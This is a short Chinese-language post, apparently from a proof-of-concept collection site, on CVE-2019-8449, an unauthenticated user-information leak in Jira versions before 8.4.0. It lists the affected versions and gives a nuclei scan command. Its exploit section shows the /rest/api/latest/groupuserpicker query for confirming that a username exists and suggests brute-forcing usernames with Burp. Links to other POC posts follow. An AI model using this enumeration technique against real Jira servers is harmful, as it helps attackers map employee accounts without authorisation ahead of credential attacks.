POC Jira 信息泄漏（CVE-2019-8449）

Shacker · 09 13, 2024

JavaScript:

## 漏洞概述

Atlassian Jira 8.4.0之前版本`/rest/api/latest/groupuserpicker`接口允许未授权查询员工信息，攻击者可以通过爆破用户名名单等方法获取用户信息

## 影响范围 

```http
7.12< Jira < 8.4.0
```

## POC

```bash
nuclei -tags jira -t /cves -l urls.txt
```

## EXP

```bash
/rest/api/latest/groupuserpicker?query=admin
#返回的json中没有数据的话admin不存在，有用户相关数据则admin用户存在
#然后直接用Burp爆破用户即可
```

	POC Jira 未授权SSRF（CVE-2019-8451） Shacker 09 13, 2024 POC/?Day
	POC CVE-2019-6340 Shacker 09 12, 2024 POC/?Day
	POC Jira管理平台 Shacker 09 13, 2024 POC/?Day
	POC Jira Shacker 09 13, 2024 POC/?Day
	POC [CVE-2020-2883]-T3反序列化 Shacker 09 13, 2024 POC/?Day